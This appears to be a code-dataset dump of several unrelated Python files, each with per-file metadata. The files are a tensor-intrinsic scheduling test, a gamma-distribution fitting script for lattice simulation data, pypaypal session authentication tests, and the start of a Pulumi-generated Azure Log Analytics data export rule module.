# func_ref(*inputs_arrays, *outputs_arrays_ref)
main_op_map = {
intrin_dag.op_lst[0]: target_dag.op_lst[0]
}
elem_op_map = {
}
ii, = intrin_dag.op_lst[0].axis
kk, = intrin_dag.op_lst[0].reduce_axis
n, k, p, q = target_dag.op_lst[0].axis
rc, rr, rs = target_dag.op_lst[0].reduce_axis
axis_map = {
ii: [k, k, k],
kk: [rc, rr, rs]
}
match_result = at.IntrinMatchResult(
hw_abs_dag, compute_key, shape_key,
main_op_map, elem_op_map,
axis_map, target_dag, intrin_dag
)
gen = at.MappingGenerator(match_result)
beg = time.time()
for i in range(1):
record = gen.get(policy="random")
record.vmap_choice = ([1, 1, 1], record.vmap_choice[1])
print("transform decision:")
for k, v in record.to_json().items():
print(k, "=", v)
app = at.MappingApplier(match_result)
new_state = app.apply(record)
schedule_gen = at.LLVMScheduleGenerator(match_result, new_state)
sc_info = schedule_gen.get_schedule_compute_info()
schedule_app = at.LLVMScheduleApplier(match_result, sc_info)
params_lst = []
trials = 1
print("trials=", trials)
for j in range(trials):
params = schedule_gen.get(policy="random")
my_params = {
'inline': (0, 1),
'vectorize': (1, 1),
'spatial_factors': [([2, 1], (0, 0)), ([4, 1], (-1, 1)), ([14, 1], (-1, -1)), ([14, 1], (-1, -1))],
'reduce_factors': [([3, 2], (1, 1)), ([1, 1, 3], (0, -1))],
'last_factors': [([-1, 32], (-1,))],
}
params.from_json(my_params)
params_lst.append(params)
build_func = "default"
target_host = "llvm -mcpu=skylake-avx512"
timeout = 150
verbose = 1
# build_results = tg_parallel_builder_build(
# schedule_app,
# params_lst,
# hw_abs_dag.target,
# target_host,
# timeout=timeout,
# build_func=build_func,
# verbose=verbose)
build_results = pebble_local_builder_build(
schedule_app,
params_lst,
hw_abs_dag.target,
target_host,
timeout,
1,
build_func=build_func)
for r in build_results:
print(r)
number = 1
repeat = 1
min_repeat_ms = 150
cooldown_interval = 1
enable_cpu_cache_flush = 1
run_results = pebble_local_runner_run(
hw_abs_dag.target,
0,
build_results,
timeout,
number,
repeat,
min_repeat_ms,
cooldown_interval,
enable_cpu_cache_flush,
verbose
)
for r in run_results:
print(r)
gen.feedback(record, np.random.random())
end = time.time()
print("Pass %f seconds." % (end - beg))
print("Pass!\n")
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser()
parser.add_argument("--case", help="test case", type=int, default=1)
parser.add_argument("--all", help="test all", action="store_true")
args = parser.parse_args()
if args.all:
for k, v in TEST_CASES.items():
print("############################################")
print("test", k)
v()
print("Pass!")
else:
assert args.case in TEST_CASES, "Can't find case %s." % (
str(args.case))
case = TEST_CASES[args.case]
case()
| 33.217502
| 127
| 0.564027
| 6,556
| 52,384
| 4.252898
| 0.068639
| 0.032602
| 0.015781
| 0.018578
| 0.86303
| 0.848504
| 0.83007
| 0.814396
| 0.794742
| 0.772972
| 0
| 0.018451
| 0.324374
| 52,384
| 1,576
| 128
| 33.238579
| 0.769355
| 0.137809
| 0
| 0.74895
| 0
| 0
| 0.040003
| 0.007103
| 0
| 0
| 0
| 0.001269
| 0.007557
| 1
| 0.020991
| false
| 0.011755
| 0.016793
| 0
| 0.055416
| 0.071369
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
8a248160aecd030fbd680720ecb8edc8ce0e858d
| 14,476
|
py
|
Python
|
triangular_lattice/diecutting/result_N_ave.py
|
ssh0/growing-string
|
2e43916e91157dfb4253775149b35ec9d81ef14d
|
[
"MIT"
] | null | null | null |
triangular_lattice/diecutting/result_N_ave.py
|
ssh0/growing-string
|
2e43916e91157dfb4253775149b35ec9d81ef14d
|
[
"MIT"
] | 1
|
2016-04-14T08:15:28.000Z
|
2016-04-27T02:57:13.000Z
|
triangular_lattice/diecutting/result_N_ave.py
|
ssh0/growing-string
|
2e43916e91157dfb4253775149b35ec9d81ef14d
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# -*- coding:utf-8 -*-
#
# written by Shotaro Fujimoto
# 2016-12-06
import matplotlib
import matplotlib.pyplot as plt
import matplotlib.cm as cm
from matplotlib.backends.backend_pdf import PdfPages
from mpl_toolkits.mplot3d.axes3d import Axes3D
import numpy as np
from scipy.optimize import curve_fit
from scipy.stats import gamma
import time
import set_data_path
def load_data(_path):
data = np.load(_path)
beta = data['beta']
num_of_strings = data['num_of_strings']
frames = data['frames']
Ls = data['Ls'].astype(np.float)
# Ls = (3 * Ls * (Ls + 1) + 1)
size_dist = data['size_dist']
# print size_dist.shape
# M = np.array([np.sum(l) - len(l) for l in size_dist])
M = np.array([np.sum(l) for l in size_dist])
M_ave = M / np.sum(M)
return {
'beta': beta,
'num_of_strings': num_of_strings,
'frames': frames,
'Ls': Ls,
'M_ave': M_ave
}
def show_plot1(ax, num_of_strings):
ax.legend(loc='best')
ax.set_ylim((0., ax.get_ylim()[1]))
ax.set_title('Strings in hexagonal region' +
' (sample: {})'.format(num_of_strings))
ax.set_xlabel(r'Cutting size $L$')
ax.set_ylabel('Average number of the sub-clusters (normalized)')
def fit_a_x0_scale(path):
betas = []
a = []
loc = []
scale = []
fig, ax = plt.subplots()
for i, result_data_path in enumerate(path):
globals().update(load_data(result_data_path))
ax.plot(Ls, M_ave, '.', label=r'$\beta = %2.2f$' % beta,
color=cm.viridis(float(i) / len(path)))
popt = curve_fit(gamma.pdf, xdata=Ls, ydata=M_ave, p0=[2.5, -5., 10.])[0]
print beta, popt
betas.append(beta)
a.append(popt[0])
loc.append(popt[1])
scale.append(popt[2])
x = np.linspace(0, max(Ls), num=5*max(Ls))
ax.plot(x, gamma.pdf(x, a=popt[0], loc=popt[1], scale=popt[2]),
'-', label=r'fitted $\beta = %2.2f$' % beta,
color=cm.viridis(float(i) / len(path)))
show_plot1(ax, num_of_strings)
plt.show()
betas = np.array(betas)
a = np.array(a)
loc = np.array(loc)
scale = np.array(scale)
fig, (ax1, ax2, ax3) = plt.subplots(3, 1)
ax1.plot(betas, a, 'o')
[ax.set_xlabel(r'$\beta$') for ax in [ax1, ax2, ax3]]
[ax.set_xlim((0, max(betas))) for ax in [ax1, ax2, ax3]]
ax1.set_ylabel(r'Shape parameter: $a$')
ax2.plot(betas, loc, 'o')
ax2.set_ylabel(r'Translation parameter: $x_{0}$')
# ax3.plot(-betas, -scale) # お試し
ax3.plot(betas, scale, 'o')
ax3.set_ylabel(r'Scale parameter: $\theta$')
plt.show()
def fit_a_scale(path, fixed_loc):
def modified_gamma(x, a, scale):
# loc = c * a + d
loc = fixed_loc
return gamma.pdf(x, a=a, loc=loc, scale=scale)
betas = []
a = []
scale = []
fig, ax = plt.subplots()
for i, result_data_path in enumerate(path):
globals().update(load_data(result_data_path))
ax.plot(Ls, M_ave, '.', label=r'$\beta = %2.2f$' % beta,
color=cm.viridis(float(i) / len(path)))
popt = curve_fit(modified_gamma, xdata=Ls, ydata=M_ave, p0=[2.5, 10.])[0]
print beta, popt
betas.append(beta)
a.append(popt[0])
scale.append(popt[1])
x = np.linspace(0, max(Ls), num=5*max(Ls))
ax.plot(x, modified_gamma(x, a=popt[0], scale=popt[1]),
'-', label=r'fitted $\beta = %2.2f$' % beta,
color=cm.viridis(float(i) / len(path)))
show_plot1(ax, num_of_strings)
plt.show()
betas = np.array(betas)
a = np.array(a)
scale = np.array(scale)
fig, (ax1, ax2) = plt.subplots(2, 1)
ax1.set_title(r'Fitting parameter (fixed: $x_{0} = 0$)')
ax1.plot(betas, a, 'o')
[ax.set_xlabel(r'$\beta$') for ax in [ax1, ax2]]
[ax.set_xlim((0, max(betas))) for ax in [ax1, ax2]]
ax1.set_ylabel(r'Shape parameter: $a$')
ax2.plot(betas, scale, 'o')
ax2.set_ylabel(r'Scale parameter: $\theta$')
plt.show()
def fit_scale(path, fixed_a, fixed_loc, save_image=False):
matplotlib.rcParams['savefig.dpi'] = 300
def modified_gamma_2(x, scale):
a = fixed_a
loc = fixed_loc
return gamma.pdf(x, a=a, loc=loc, scale=scale)
betas = []
scale = []
fig, ax = plt.subplots()
for i, result_data_path in enumerate(path):
globals().update(load_data(result_data_path))
ax.plot(Ls, M_ave, '.', label=r'$\beta = %2.2f$' % beta,
color=cm.viridis(float(i) / len(path)))
popt = curve_fit(modified_gamma_2, xdata=Ls, ydata=M_ave, p0=[10.])[0]
# print beta, popt
betas.append(beta)
scale.append(popt[0])
x = np.linspace(0, max(Ls), num=5*max(Ls))
ax.plot(x, modified_gamma_2(x, scale=popt[0]),
'-',
# label=r'fitted $\beta = %2.2f$' % beta,
color=cm.viridis(float(i) / len(path)))
## critical point
# critcal_point = 2. * popt[0] # x = (a - 1) * scale
# ax.plot([critcal_point] * 2, [0., 0.05], '-',
# color=cm.viridis(float(i) / len(path)))
show_plot1(ax, num_of_strings)
if save_image:
result_image_path = "../results/img/diecutting/fitted_gamma_fixed_a_x0"
result_image_path += "_" + time.strftime("%y%m%d_%H%M%S")
pdf = PdfPages(result_image_path + ".pdf")
plt.savefig(result_image_path + ".png")
pdf.savefig()
pdf.close()
plt.close()
print "[saved] " + result_image_path
else:
plt.show()
plt.close()
betas = np.array(betas)
scale = np.array(scale)
# beta_theta = lambda x, a, b: a*x + b
beta_theta = lambda x, a, b: a*np.log(x) + b
fig, ax = plt.subplots()
ax.set_title(r'Fitting parameter')
ax.plot(betas, scale, 'o')
popt = curve_fit(beta_theta, xdata=betas, ydata=scale, p0=[15., 0.])[0]
x = np.linspace(min(betas), max(betas))
# ax.plot(x, beta_theta(x, popt[0], popt[1]), '-', color='k',
# label=r'$\theta = {} \beta + {}$'.format(*popt),
# )
ax.plot(x, beta_theta(x, popt[0], popt[1]), '-', color='k',
label=r'$\theta = {} \log \beta + {}$'.format(*popt),
)
ax.legend(loc='best')
ax.set_xlim((0, max(betas)))
ax.set_ylim((0, ax.get_ylim()[1]))
ax.set_xlabel(r'$\beta$')
ax.set_ylabel(r'Scale parameter: $\theta$')
if save_image:
result_image_path = "../results/img/diecutting/fitted_parameters_fixed_a_x0"
result_image_path += "_" + time.strftime("%y%m%d_%H%M%S")
pdf = PdfPages(result_image_path + ".pdf")
plt.savefig(result_image_path + ".png")
pdf.savefig()
pdf.close()
plt.close()
print "[saved] " + result_image_path
else:
plt.show()
plt.close()
plt.show()
def fit_fermi(path, save_image=False):
matplotlib.rcParams['savefig.dpi'] = 300
def fitting_func(x, theta):
return 0.5 * ((x ** 2.) / ((theta ** 3.) * (np.exp(x / theta) - 1.)))
betas = []
scale = []
fig, ax = plt.subplots()
for i, result_data_path in enumerate(path):
globals().update(load_data(result_data_path))
ax.plot(Ls, M_ave, '.', label=r'$\beta = %2.2f$' % beta,
color=cm.viridis(float(i) / len(path)))
popt = curve_fit(fitting_func, xdata=Ls, ydata=M_ave, p0=[10.,])[0]
# print beta, popt
betas.append(beta)
scale.append(popt[0])
x = np.linspace(0, max(Ls), num=5*max(Ls))
ax.plot(x, fitting_func(x, theta=popt[0]),
'-',
# label=r'fitted $\beta = %2.2f$' % beta,
color=cm.viridis(float(i) / len(path)))
## critical point
# critcal_point = 2. * popt[0] # x = (a - 1) * scale
# ax.plot([critcal_point] * 2, [0., 0.05], '-',
# color=cm.viridis(float(i) / len(path)))
show_plot1(ax, num_of_strings)
if save_image:
result_image_path = "../results/img/diecutting/fitted_gamma_fixed_a_x0"
result_image_path += "_" + time.strftime("%y%m%d_%H%M%S")
pdf = PdfPages(result_image_path + ".pdf")
plt.savefig(result_image_path + ".png")
pdf.savefig()
pdf.close()
plt.close()
print "[saved] " + result_image_path
else:
plt.show()
plt.close()
betas = np.array(betas)
scale = np.array(scale)
fig, ax = plt.subplots()
ax.set_title(r'Fitting parameter')
ax.plot(betas, scale, 'o')
ax.set_xlabel(r'$\beta$')
ax.set_xlim((0, max(betas)))
ax.set_ylabel(r'$\theta$')
if save_image:
result_image_path = "../results/img/diecutting/fitted_parameters_fixed_a_x0"
result_image_path += "_" + time.strftime("%y%m%d_%H%M%S")
pdf = PdfPages(result_image_path + ".pdf")
plt.savefig(result_image_path + ".png")
pdf.savefig()
pdf.close()
plt.close()
print "[saved] " + result_image_path
else:
plt.show()
plt.close()
plt.show()
def fermi(path, fixed_a, fixed_loc, save_image=False):
matplotlib.rcParams['savefig.dpi'] = 300
def modified_gamma_2(x, scale):
a = fixed_a
loc = fixed_loc
return gamma.pdf(x, a=a, loc=loc, scale=scale)
betas = []
scale = []
L = []
S = []
fig, ax = plt.subplots()
for i, result_data_path in enumerate(path):
globals().update(load_data(result_data_path))
L.append(Ls)
S.append(M_ave)
popt = curve_fit(modified_gamma_2, xdata=Ls, ydata=M_ave, p0=[10.])[0]
# print beta, popt
betas.append(beta)
theta = popt[0]
scale.append(theta)
ax.plot(Ls / theta, M_ave * theta, '.', label=r'$\beta = %2.2f$' % beta,
color=cm.viridis(float(i) / len(path)))
show_plot1(ax, num_of_strings)
ax.set_title(r'Collapsed data')
ax.set_xlabel(r'$L / \theta$')
ax.set_ylabel(r'$\theta * f(L)$')
plt.show()
# if save_image:
# result_image_path = "../results/img/diecutting/fitted_gamma_fixed_a_x0"
# result_image_path += "_" + time.strftime("%y%m%d_%H%M%S")
# pdf = PdfPages(result_image_path + ".pdf")
# plt.savefig(result_image_path + ".png")
# pdf.savefig()
# pdf.close()
# plt.close()
# print "[saved] " + result_image_path
# else:
# plt.show()
# plt.close()
# betas = np.array(betas)
# scale = np.array(scale)
# beta_theta = lambda x, a, b: a*x + b
# # beta_theta = lambda x, a, b: a*np.log(x) + b
# # fig, ax = plt.subplots()
# # ax.set_title(r'Fitting parameter')
# # ax.plot(betas, scale, 'o')
# popt = curve_fit(beta_theta, xdata=betas, ydata=scale, p0=[15., 0.])[0]
# # x = np.linspace(min(betas), max(betas))
# # ax.plot(x, beta_theta(x, popt[0], popt[1]), '-', color='k',
# # label=r'$\theta = {} \beta + {}$'.format(*popt),
# # )
# # ax.plot(x, beta_theta(x, popt[0], popt[1]), '-', color='k',
# # label=r'$\theta = {} \log \beta + {}$'.format(*popt),
# # )
# another_fitted_theta = beta_theta(betas, popt[0], popt[1])
# ## One more time:
# ## But this time, use fitted (splined) theta.
# fig, ax = plt.subplots()
# for i, result_data_path in enumerate(path):
# globals().update(load_data(result_data_path))
# theta = another_fitted_theta[i]
# ax.plot(Ls / theta, M_ave * theta, '.', label=r'$\beta = %2.2f$' % beta,
# color=cm.viridis(float(i) / len(path)))
# show_plot1(ax, num_of_strings)
# ax.set_title(r'Collapsed data (another fitted theta)')
# ax.set_xlabel(r'$L / \theta$')
# ax.set_ylabel(r'$\theta * f(L)$')
# plt.show()
# ax.legend(loc='best')
# ax.set_xlim((0, max(betas)))
# ax.set_ylim((0, ax.get_ylim()[1]))
# ax.set_xlabel(r'$\beta$')
# ax.set_ylabel(r'Scale parameter: $\theta$')
# if save_image:
# result_image_path = "../results/img/diecutting/fitted_parameters_fixed_a_x0"
# result_image_path += "_" + time.strftime("%y%m%d_%H%M%S")
# pdf = PdfPages(result_image_path + ".pdf")
# plt.savefig(result_image_path + ".png")
# pdf.savefig()
# pdf.close()
# plt.close()
# print "[saved] " + result_image_path
# else:
# plt.show()
# plt.close()
# plt.show()
def no_fit(path, fixed_a, fixed_loc, _a, _b, save_image=False):
matplotlib.rcParams['savefig.dpi'] = 300
def modified_gamma_3(x, beta):
a = fixed_a
loc = fixed_loc
# scale = _a * beta + _b
scale = _a * np.log(beta) + _b
return gamma.pdf(x, a=a, loc=loc, scale=scale)
betas = []
scale = []
fig, ax = plt.subplots()
for i, result_data_path in enumerate(path):
globals().update(load_data(result_data_path))
ax.plot(Ls, M_ave, '.', label=r'$\beta = %2.2f$' % beta,
color=cm.viridis(float(i) / len(path)))
betas.append(beta)
x = np.linspace(0, max(Ls), num=5*max(Ls))
ax.plot(x, modified_gamma_3(x, beta),
'-',
# label=r'fitted $\beta = %2.2f$' % beta,
color=cm.viridis(float(i) / len(path)))
show_plot1(ax, num_of_strings)
if save_image:
result_image_path = "../results/img/diecutting/fitted_gamma_fixed_a_x0"
result_image_path += "_" + time.strftime("%y%m%d_%H%M%S")
pdf = PdfPages(result_image_path + ".pdf")
plt.savefig(result_image_path + ".png")
pdf.savefig()
pdf.close()
plt.close()
print "[saved] " + result_image_path
else:
plt.show()
plt.close()
if __name__ == '__main__':
# fit_a_x0_scale(set_data_path.data_path)
# fit_a_scale(set_data_path.data_path, fixed_loc=0.)
# fit_scale(set_data_path.data_path, fixed_a=3., fixed_loc=0., save_image=False)
# fit_fermi(set_data_path.data_path, save_image=False)
# # no_fit(set_data_path.data_path, fixed_a=3., fixed_loc=0., _a=3.6, _b=0., save_image=False)
# no_fit(set_data_path.data_path, fixed_a=3., fixed_loc=0., _a=19., _b=-8., save_image=False)
fermi(set_data_path.data_path, fixed_a=3., fixed_loc=0., save_image=False)
| 32.240535
| 99
| 0.564521
| 2,104
| 14,476
| 3.698669
| 0.085076
| 0.049473
| 0.067463
| 0.034181
| 0.830249
| 0.816885
| 0.801979
| 0.781547
| 0.77358
| 0.767412
| 0
| 0.021129
| 0.261122
| 14,476
| 448
| 100
| 32.3125
| 0.706432
| 0.232039
| 0
| 0.676259
| 0
| 0
| 0.100982
| 0.023178
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.035971
| null | null | 0.02518
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
8a4834d7767ec22aaa39441e6cc7545e731ecc6b
| 6,311
|
py
|
Python
|
test/http_test.py
|
ivcuello/pypaypal
|
957cbd4e8d2127b0fc639825ce3a3924acd3216d
|
[
"Apache-2.0"
] | 1
|
2022-01-18T03:01:34.000Z
|
2022-01-18T03:01:34.000Z
|
test/http_test.py
|
ivcuello/pypaypal
|
957cbd4e8d2127b0fc639825ce3a3924acd3216d
|
[
"Apache-2.0"
] | 10
|
2021-01-31T14:33:16.000Z
|
2021-01-31T14:45:02.000Z
|
test/http_test.py
|
ivcuello/pypaypal
|
957cbd4e8d2127b0fc639825ce3a3924acd3216d
|
[
"Apache-2.0"
] | null | null | null |
"""Integration Test module for main http module
it's required to provide client & secret
ENV variables for this tests executions
"""
import os
import unittest
from pypaypal.errors import IdentityError, ExpiredSessionError
from pypaypal.http import (
AuthType,
parse_url,
SessionMode,
PayPalSession,
SessionStatus,
authenticate,
session_from_token
)
_MODE = SessionMode.SANDBOX
def test_disposability(session :PayPalSession):
try:
with session:
pass
session.get('https://api.sandbox.paypal.com/v2/payments/authorizations/6W688518YP6703149')
raise AssertionError('This must be unreachable')
except ExpiredSessionError:
print('Expired session test OK!!')
class TestOAuthSession(unittest.TestCase):
"""Test class for OAuthSession implementation
"""
def setUp(self):
self.auth_type = AuthType.TOKEN
self.client = os.environ['TEST_PP_CLIENT']
self.secret = os.environ['TEST_PP_SECRET']
self.auth_session = authenticate(self.client, self.secret, _MODE, self.auth_type)
def tearDown(self):
self.client = None
self.secret = None
self.auth_session = None
def test_invalid_authentication(self):
try:
authenticate(self.client, 'invalid-secret', _MODE, self.auth_type)
raise AssertionError('An IdentityError was expected.')
except IdentityError:
print('IdentityError test OK!!')
def test_authentication(self):
auth_session = authenticate(self.client, self.secret, _MODE, self.auth_type)
self.assertEqual(auth_session.status, SessionStatus.ACTIVE)
def test_session_from_token(self):
token_session = session_from_token(self.auth_session._paypal_token, _MODE)
self.assertEqual(token_session.status, SessionStatus.ACTIVE)
def test_disposability(self):
disposable_session = session_from_token(self.auth_session._paypal_token, _MODE)
self.assertEqual(disposable_session.status, SessionStatus.ACTIVE)
test_disposability(disposable_session)
self.assertEqual(disposable_session.status, SessionStatus.DISPOSED)
def test_session_expiration(self):
pass
def test_post(self):
pass
def test_get(self):
pass
def test_put(self):
pass
def test_patch(self):
pass
def test_delete(self):
pass
class TestBasicSession(unittest.TestCase):
"""Test class for BasicSession implementation
"""
def setUp(self):
self.auth_type = AuthType.BASIC
self.client = os.environ['TEST_PP_CLIENT']
self.secret = os.environ['TEST_PP_SECRET']
self.auth_session = authenticate(self.client, self.secret, _MODE, self.auth_type)
def tearDown(self):
self.client = None
self.secret = None
self.auth_session = None
def test_invalid_authentication(self):
try:
authenticate(self.client, 'invalid-secret', _MODE, self.auth_type)
raise AssertionError('An IdentityError was expected.')
except IdentityError:
print('IdentityError test OK!!')
def test_authentication(self):
auth_session = authenticate(self.client, self.secret, _MODE, self.auth_type)
self.assertEqual(auth_session.status, SessionStatus.ACTIVE)
def test_session_from_token(self):
token_session = session_from_token(self.auth_session._paypal_token, _MODE)
self.assertEqual(token_session.status, SessionStatus.ACTIVE)
def test_disposability(self):
disposable_session = session_from_token(self.auth_session._paypal_token, _MODE)
self.assertEqual(disposable_session.status, SessionStatus.ACTIVE)
test_disposability(disposable_session)
self.assertEqual(disposable_session.status, SessionStatus.DISPOSED)
def test_session_expiration(self):
pass
def test_post(self):
pass
def test_get(self):
pass
def test_put(self):
pass
def test_patch(self):
pass
def test_delete(self):
pass
class TestRefreshableSession(unittest.TestCase):
"""Test class for RefreshableSession implementation
"""
def setUp(self):
self.auth_type = AuthType.REFRESHABLE
self.client = os.environ['TEST_PP_CLIENT']
self.secret = os.environ['TEST_PP_SECRET']
self.auth_session = authenticate(self.client, self.secret, _MODE, self.auth_type)
def tearDown(self):
self.client = None
self.secret = None
self.auth_session = None
def test_invalid_authentication(self):
try:
authenticate(self.client, 'invalid-secret', _MODE, self.auth_type)
raise AssertionError('An IdentityError was expected.')
except IdentityError:
print('IdentityError test OK!!')
def test_authentication(self):
auth_session = authenticate(self.client, self.secret, _MODE, self.auth_type)
self.assertEqual(auth_session.status, SessionStatus.ACTIVE)
def test_session_from_token(self):
token_session = session_from_token(self.auth_session._paypal_token, _MODE)
self.assertEqual(token_session.status, SessionStatus.ACTIVE)
def test_disposability(self):
disposable_session = session_from_token(self.auth_session._paypal_token, _MODE)
self.assertEqual(disposable_session.status, SessionStatus.ACTIVE)
test_disposability(disposable_session)
self.assertEqual(disposable_session.status, SessionStatus.DISPOSED)
def test_session_expiration(self):
pass
def test_post(self):
pass
def test_get(self):
pass
def test_put(self):
pass
def test_patch(self):
pass
def test_delete(self):
pass
class TestModuleMethods(unittest.TestCase):
def test_parse_url(self):
"""url parsing function test
"""
expected = 'https://api.sandbox.paypal.com/v2/billing/subscriptions'
actual = parse_url('https://api.sandbox.paypal.com/v2', 'billing', '/subscriptions')
self.assertEqual(expected, actual)
if __name__ == '__main__':
unittest.main()
| 31.39801
| 98
| 0.678498
| 701
| 6,311
| 5.880171
| 0.145506
| 0.054343
| 0.054585
| 0.054585
| 0.81247
| 0.792091
| 0.785784
| 0.785784
| 0.729985
| 0.729985
| 0
| 0.003514
| 0.233402
| 6,311
| 201
| 99
| 31.39801
| 0.848491
| 0.049437
| 0
| 0.77931
| 0
| 0
| 0.088152
| 0
| 0
| 0
| 0
| 0
| 0.117241
| 1
| 0.262069
| false
| 0.131034
| 0.027586
| 0
| 0.317241
| 0.027586
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 9
|
8a605f7632ae15091c238f192b6d156d14233923
| 24,640
|
py
|
Python
|
sdk/python/pulumi_azure/loganalytics/data_export_rule.py
|
henriktao/pulumi-azure
|
f1cbcf100b42b916da36d8fe28be3a159abaf022
|
[
"ECL-2.0",
"Apache-2.0"
] | 109
|
2018-06-18T00:19:44.000Z
|
2022-02-20T05:32:57.000Z
|
sdk/python/pulumi_azure/loganalytics/data_export_rule.py
|
henriktao/pulumi-azure
|
f1cbcf100b42b916da36d8fe28be3a159abaf022
|
[
"ECL-2.0",
"Apache-2.0"
] | 663
|
2018-06-18T21:08:46.000Z
|
2022-03-31T20:10:11.000Z
|
sdk/python/pulumi_azure/loganalytics/data_export_rule.py
|
henriktao/pulumi-azure
|
f1cbcf100b42b916da36d8fe28be3a159abaf022
|
[
"ECL-2.0",
"Apache-2.0"
] | 41
|
2018-07-19T22:37:38.000Z
|
2022-03-14T10:56:26.000Z
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
__all__ = ['DataExportRuleArgs', 'DataExportRule']
@pulumi.input_type
class DataExportRuleArgs:
def __init__(__self__, *,
destination_resource_id: pulumi.Input[str],
resource_group_name: pulumi.Input[str],
table_names: pulumi.Input[Sequence[pulumi.Input[str]]],
workspace_resource_id: pulumi.Input[str],
enabled: Optional[pulumi.Input[bool]] = None,
name: Optional[pulumi.Input[str]] = None):
"""
The set of arguments for constructing a DataExportRule resource.
:param pulumi.Input[str] destination_resource_id: The destination resource ID. It should be a storage account, an event hub namespace or an event hub. If the destination is an event hub namespace, an event hub would be created for each table automatically.
:param pulumi.Input[str] resource_group_name: The name of the Resource Group where the Log Analytics Data Export should exist. Changing this forces a new Log Analytics Data Export Rule to be created.
:param pulumi.Input[Sequence[pulumi.Input[str]]] table_names: A list of table names to export to the destination resource, for example: `["Heartbeat", "SecurityEvent"]`.
:param pulumi.Input[str] workspace_resource_id: The resource ID of the workspace. Changing this forces a new Log Analytics Data Export Rule to be created.
:param pulumi.Input[bool] enabled: Is this Log Analytics Data Export Rule enabled? Possible values include `true` or `false`. Defaults to `false`.
:param pulumi.Input[str] name: The name of the Log Analytics Data Export Rule. Changing this forces a new Log Analytics Data Export Rule to be created.
"""
pulumi.set(__self__, "destination_resource_id", destination_resource_id)
pulumi.set(__self__, "resource_group_name", resource_group_name)
pulumi.set(__self__, "table_names", table_names)
pulumi.set(__self__, "workspace_resource_id", workspace_resource_id)
if enabled is not None:
pulumi.set(__self__, "enabled", enabled)
if name is not None:
pulumi.set(__self__, "name", name)
@property
@pulumi.getter(name="destinationResourceId")
def destination_resource_id(self) -> pulumi.Input[str]:
"""
The destination resource ID. It should be a storage account, an event hub namespace or an event hub. If the destination is an event hub namespace, an event hub would be created for each table automatically.
"""
return pulumi.get(self, "destination_resource_id")
@destination_resource_id.setter
def destination_resource_id(self, value: pulumi.Input[str]):
pulumi.set(self, "destination_resource_id", value)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Input[str]:
"""
The name of the Resource Group where the Log Analytics Data Export should exist. Changing this forces a new Log Analytics Data Export Rule to be created.
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: pulumi.Input[str]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter(name="tableNames")
def table_names(self) -> pulumi.Input[Sequence[pulumi.Input[str]]]:
"""
A list of table names to export to the destination resource, for example: `["Heartbeat", "SecurityEvent"]`.
"""
return pulumi.get(self, "table_names")
@table_names.setter
def table_names(self, value: pulumi.Input[Sequence[pulumi.Input[str]]]):
pulumi.set(self, "table_names", value)
@property
@pulumi.getter(name="workspaceResourceId")
def workspace_resource_id(self) -> pulumi.Input[str]:
"""
The resource ID of the workspace. Changing this forces a new Log Analytics Data Export Rule to be created.
"""
return pulumi.get(self, "workspace_resource_id")
@workspace_resource_id.setter
def workspace_resource_id(self, value: pulumi.Input[str]):
pulumi.set(self, "workspace_resource_id", value)
@property
@pulumi.getter
def enabled(self) -> Optional[pulumi.Input[bool]]:
"""
Is this Log Analytics Data Export Rule enabled? Possible values include `true` or `false`. Defaults to `false`.
"""
return pulumi.get(self, "enabled")
@enabled.setter
def enabled(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "enabled", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the Log Analytics Data Export Rule. Changing this forces a new Log Analytics Data Export Rule to be created.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@pulumi.input_type
class _DataExportRuleState:
def __init__(__self__, *,
destination_resource_id: Optional[pulumi.Input[str]] = None,
enabled: Optional[pulumi.Input[bool]] = None,
export_rule_id: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
table_names: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
workspace_resource_id: Optional[pulumi.Input[str]] = None):
"""
Input properties used for looking up and filtering DataExportRule resources.
:param pulumi.Input[str] destination_resource_id: The destination resource ID. It should be a storage account, an event hub namespace or an event hub. If the destination is an event hub namespace, an event hub would be created for each table automatically.
:param pulumi.Input[bool] enabled: Is this Log Analytics Data Export Rule enabled? Possible values include `true` or `false`. Defaults to `false`.
:param pulumi.Input[str] export_rule_id: The ID of the created Data Export Rule.
:param pulumi.Input[str] name: The name of the Log Analytics Data Export Rule. Changing this forces a new Log Analytics Data Export Rule to be created.
:param pulumi.Input[str] resource_group_name: The name of the Resource Group where the Log Analytics Data Export should exist. Changing this forces a new Log Analytics Data Export Rule to be created.
:param pulumi.Input[Sequence[pulumi.Input[str]]] table_names: A list of table names to export to the destination resource, for example: `["Heartbeat", "SecurityEvent"]`.
